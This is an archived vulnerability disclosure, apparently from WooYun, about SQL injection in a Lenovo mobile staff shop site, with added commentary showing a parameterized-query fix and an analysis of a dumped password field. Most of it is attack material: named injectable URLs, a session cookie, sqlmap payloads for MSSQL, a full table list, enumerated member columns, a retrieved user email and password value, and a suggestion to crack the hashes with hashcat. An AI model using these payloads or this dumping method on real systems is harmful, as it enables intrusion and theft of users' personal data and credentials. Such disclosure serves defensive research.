WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2013-08-25: Details sent to the vendor, awaiting vendor response
2013-08-26: Vendor confirmed; details disclosed to the vendor only
2013-09-05: Details disclosed to core white hats and domain experts
2013-09-15: Details disclosed to regular white hats
2013-09-25: Details disclosed to intern white hats
2013-10-09: Details disclosed to the public
So many vulnerabilities. PS: turns out Lenovo employees get really cheap internal pricing: the Lenovo A656 smartphone retails for 1399 but is 851 internally; the leather case retails for 149, internally 34; the protective shell retails for 55, internally 9.5. The internal group-buy prices are far below retail; the retail prices really are padded!
Injection points:
1. http://ess.lenovomobile.com/shopLst.aspx?RackCode=A11
2. http://ess.lenovomobile.com/shopLst.aspx?PageSize=20&PageNum=1&OrderBy=PublishDate+Desc&EchoType=1&RackCode=A11
Both require a logged-in session, which is probably why they are not easy to spot. Use this cookie: ASP.NET_SessionId=h3t1sdbpwidnyd45y2ntf0ni (if it does not work, the session has expired).
---
Place: GET
Parameter: RackCode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: RackCode=A11' AND 9638=9638 AND 'NoGV'='NoGV

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: RackCode=A11' AND 9922=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(107)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9922=9922) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(109)+CHAR(104)+CHAR(113))) AND 'lmYB'='lmYB

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: RackCode=A11'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: RackCode=A11' WAITFOR DELAY '0:0:5'--
---
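What the boolean-based probe above actually does to the query, shown as an added example that is not part of the report and not Lenovo's code: a handler that concatenates RackCode into the WHERE clause lets the quote in the probe close the string literal, so the injected condition decides whether rows come back (true probe returns the A11 goods, false probe returns nothing, which is all a blind injection needs); a parameterized query binds the same probe as one literal rack code and it matches nothing. SQLite stands in for the MSSQL 2008 back end (the boolean logic is identical; the CONVERT and WAITFOR payloads are MSSQL-specific and not reproduced). EssGoods is assumed to be the table behind shopLst.aspx, and the GoodsName column and its rows are constructed; only RackCode and the two probes come from the report. (The pangolin_test_table in the table list further down is worth noting too: Pangolin, another SQL injection tool, creates a table by that name during its tests, which suggests the instance had already been injected before this report.)

```python
import sqlite3

# Probes copied from the report's sqlmap output (boolean-based blind).
TRUE_PROBE = "A11' AND 9638=9638 AND 'NoGV'='NoGV"
FALSE_PROBE = "A11' AND 9638=9639 AND 'NoGV'='NoGV"  # same shape, condition made false


def make_db():
    """In-memory SQLite stand-in for lmshop. EssGoods is assumed to be the table
    behind shopLst.aspx; the GoodsName column and the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE EssGoods (GoodsName TEXT, RackCode TEXT)")
    conn.executemany(
        "INSERT INTO EssGoods VALUES (?, ?)",
        [("A656 handset", "A11"), ("Leather case", "A11"), ("Protective shell", "B07")],
    )
    return conn


def shop_list_vulnerable(conn, rack_code):
    """The pattern the payloads imply: the parameter is concatenated into the SQL
    text, so a quote in RackCode ends the literal and the rest becomes SQL."""
    sql = f"SELECT GoodsName FROM EssGoods WHERE RackCode = '{rack_code}' ORDER BY GoodsName"
    return [row[0] for row in conn.execute(sql)]


def shop_list_parameterized(conn, rack_code):
    """Fix: bind the value. The driver passes it as data, never as SQL text, so the
    probe is compared as one odd-looking rack code and matches no row."""
    sql = "SELECT GoodsName FROM EssGoods WHERE RackCode = ? ORDER BY GoodsName"
    return [row[0] for row in conn.execute(sql, (rack_code,))]


def demo():
    """Run both handlers against the true/false probes and a legitimate value."""
    conn = make_db()
    return {
        "vuln_true": shop_list_vulnerable(conn, TRUE_PROBE),    # rows leak: condition true
        "vuln_false": shop_list_vulnerable(conn, FALSE_PROBE),  # empty: condition false
        "param_true": shop_list_parameterized(conn, TRUE_PROBE),
        "param_false": shop_list_parameterized(conn, FALSE_PROBE),
        "legit": shop_list_parameterized(conn, "A11"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:12} -> {rows}")
```

The difference between `vuln_true` and `vuln_false` is exactly the signal sqlmap reads off the page to extract the table list and the EssMember rows one bit at a time. In the ASP.NET 2.0 stack fingerprinted here, the equivalent of the parameterized version is a `SqlCommand` whose text uses `@RackCode` with the value supplied through `Parameters.AddWithValue` (or a typed `SqlParameter`), instead of building the string by concatenation; character blacklisting alone does not close the error-based or time-based variants.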
Database: lmshop
[89 tables]
+--------------------------+
| EssCarDtl                |
| EssCarMst                |
| EssCmpRegiForm           |
| EssFavorites             |
| EssGoods                 |
| EssGoodsColor            |
| EssGoodsPresent          |
| EssGoodsPrice_Log        |
| EssMember                |
| EssOrder                 |
| EssSales                 |
| EssSalesGoods            |
| EssSalesMail             |
| EssVerifyCode            |
| JB_QuickLogin            |
| MailBasSet               |
| MailSet                  |
| MailTemplate             |
| MailToDtl                |
| MailToGrp                |
| MstCode                  |
| MstCsErr                 |
| MstCsLog                 |
| MstCsMenu                |
| MstCsUser                |
| MstMenu                  |
| MstMessage               |
| MstRole                  |
| MstRoleMenu              |
| MstRoleUser              |
| MstUser                  |
| PmtActivities            |
| PmtAttach                |
| PmtAttendance            |
| PmtFee                   |
| PmtGoods                 |
| PmtImg                   |
| PmtImgSize               |
| PmtOrder                 |
| PmtOrderWithDraw         |
| PmtPromoter              |
| PmtQA                    |
| PmtSettle                |
| PmtSettleDtl             |
| PmtSettleOrder           |
| PmtSettleOrderTmp        |
| PmtSettleSim             |
| PmtSettleSimDtl          |
| PmtVerifyCode            |
| RECEIVE                  |
| SEND                     |
| SellBigOrder             |
| SellCustomize            |
| SellJoinEnterprise       |
| SellJoinPerson           |
| ShopCard                 |
| SmsBasSet                |
| SmsClass                 |
| SmsDueSend               |
| SmsDueSendRec            |
| SmsNormalIF              |
| SmsNormalIFCC111021      |
| SmsNormalIfRec           |
| SmsReceive               |
| SmsReceiveType           |
| SmsSend                  |
| SmsSend100601            |
| SmsSend100602            |
| SmsSendRec               |
| SmsSysSet                |
| SmsTempIF                |
| SmsTempIfRec             |
| SmsTemplate              |
| SmsUserRight             |
| SmsWhiteBlackBill        |
| TrnFeedback              |
| TrnNews                  |
| V_EssGoodsPrice          |
| V_GetPayTypeByDistrictID |
| V_OrderGoodsType         |
| V_PmtFee                 |
| V_UserMenu               |
| ZSmsNormalIF100601       |
| ZSmsNormalIF110916       |
| ZSmsNormalIF111018       |
| bakUp_LMmbrid            |
| dtproperties             |
| pangolin_test_table      |
| sms.SmsNormalIFCC        |
+--------------------------+
[13:58:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[13:59:59] [INFO] fetching columns for table 'EssMember' in database 'lmshop'
[14:00:06] [INFO] the SQL query used returns 12 entries
[14:00:13] [INFO] retrieved: Email
[14:00:20] [INFO] retrieved: varchar
[14:00:27] [INFO] retrieved: IsValid
[14:00:34] [INFO] retrieved: nvarchar
[14:00:41] [INFO] retrieved: MbrID
[14:00:47] [INFO] retrieved: bigint
[14:00:54] [INFO] retrieved: MbrName
[14:01:00] [INFO] retrieved: varchar
[14:01:06] [INFO] retrieved: Password
[14:01:12] [INFO] retrieved: nvarchar
[14:01:19] [INFO] retrieved: Phone
[14:01:26] [INFO] retrieved: nvarchar
[14:01:33] [INFO] retrieved: RegDate
[14:01:39] [INFO] retrieved: datetime
[14:01:45] [INFO] retrieved: RegID
[14:01:51] [INFO] retrieved: nvarchar
[14:01:57] [INFO] retrieved: SalesCode
[14:02:02] [INFO] retrieved: varchar
[14:02:07] [INFO] retrieved: SalesID
[14:02:13] [INFO] retrieved: bigint
[14:02:18] [INFO] retrieved: UpdDate
[14:02:23] [INFO] retrieved: datetime
[14:02:29] [INFO] retrieved: UpdID
[14:02:35] [INFO] retrieved: nvarchar
[14:02:35] [INFO] fetching entries for table 'EssMember' in database 'lmshop'
[14:02:41] [INFO] retrieved: 8203
[14:02:41] [INFO] fetching number of distinct values for column 'Email'
[14:02:47] [INFO] retrieved: 8196
[14:02:47] [INFO] fetching number of distinct values for column 'MbrID'
[14:02:53] [INFO] retrieved: 8203
[14:02:53] [INFO] using column 'MbrID' as a pivot for retrieving row data
[14:02:59] [INFO] retrieved: 1
[14:03:05] [INFO] retrieved: [email protected]
[14:03:10] [INFO] retrieved:
[14:03:16] [INFO] retrieved:
[14:03:22] [INFO] retrieved:
[14:03:27] [INFO] retrieved: 1
[14:03:34] [INFO] retrieved: lihe
[14:03:40] [INFO] retrieved: 05 20 2009 11:27AM
[14:03:46] [INFO] retrieved: 1
[14:03:52] [INFO] retrieved: 05 20 2009 11:27AM
[14:03:57] [INFO] retrieved: FE24W1UJNg1QedCl+4dKFw==
The password is base64, isn't it!!! How is that any different from plaintext!!!
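A check on the dumped value, added here and not part of the report: decoding the base64 yields 16 bytes that are not printable text, so the Password column holds a binary value that base64 merely transports (16 bytes is the length of an MD5 digest or a single AES block), not a password you can read back by decoding. Whether the underlying scheme is an unsalted fast hash, and so crackable offline with a wordlist, cannot be told from one row; the candidate labels below are inferred from length only and are an assumption, not something the page states.

```python
import base64

# The Password value sqlmap pulled from EssMember in the report.
RETRIEVED_PASSWORD = "FE24W1UJNg1QedCl+4dKFw=="

# Assumption: the app stores some binary hash or cipher output base64-encoded.
# These labels come from the decoded length alone; the page does not say which.
CANDIDATES_BY_LENGTH = {
    16: "MD5 digest or one AES block",
    20: "SHA-1 digest",
    32: "SHA-256 digest",
    64: "SHA-512 digest",
}


def inspect_password_field(value):
    """Strictly decode the base64 and report what the raw bytes look like.

    A base64-wrapped plaintext password decodes to printable ASCII; a digest
    or ciphertext decodes to arbitrary bytes (control characters, high bytes).
    """
    raw = base64.b64decode(value, validate=True)  # reject non-alphabet characters
    is_printable = all(0x20 <= b < 0x7F for b in raw)
    return {
        "length": len(raw),
        "hex": raw.hex(),
        "printable_ascii": is_printable,
        "looks_like": (
            "plaintext password"
            if is_printable
            else CANDIDATES_BY_LENGTH.get(len(raw), "binary of unusual length")
        ),
    }


if __name__ == "__main__":
    for key, val in inspect_password_field(RETRIEVED_PASSWORD).items():
        print(f"{key}: {val}")
    # Contrast: a constructed base64-encoded plaintext ("Passw0rd!") decodes readable.
    print(inspect_password_field("UGFzc3cwcmQh"))
```

If the stored bytes are indeed an unsalted MD5 of the password, the practical difference from plaintext is small for weak passwords (a hashcat mode 0 run over the 8203 rows would recover most of them), but that is a question of hashing scheme, not of base64.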
Filter the input!
Severity: High
Vulnerability Rank: 20
Confirmed: 2013-08-26 01:33
Thank you for your contribution to Lenovo's security! We will immediately assess and fix the vulnerability.
None yet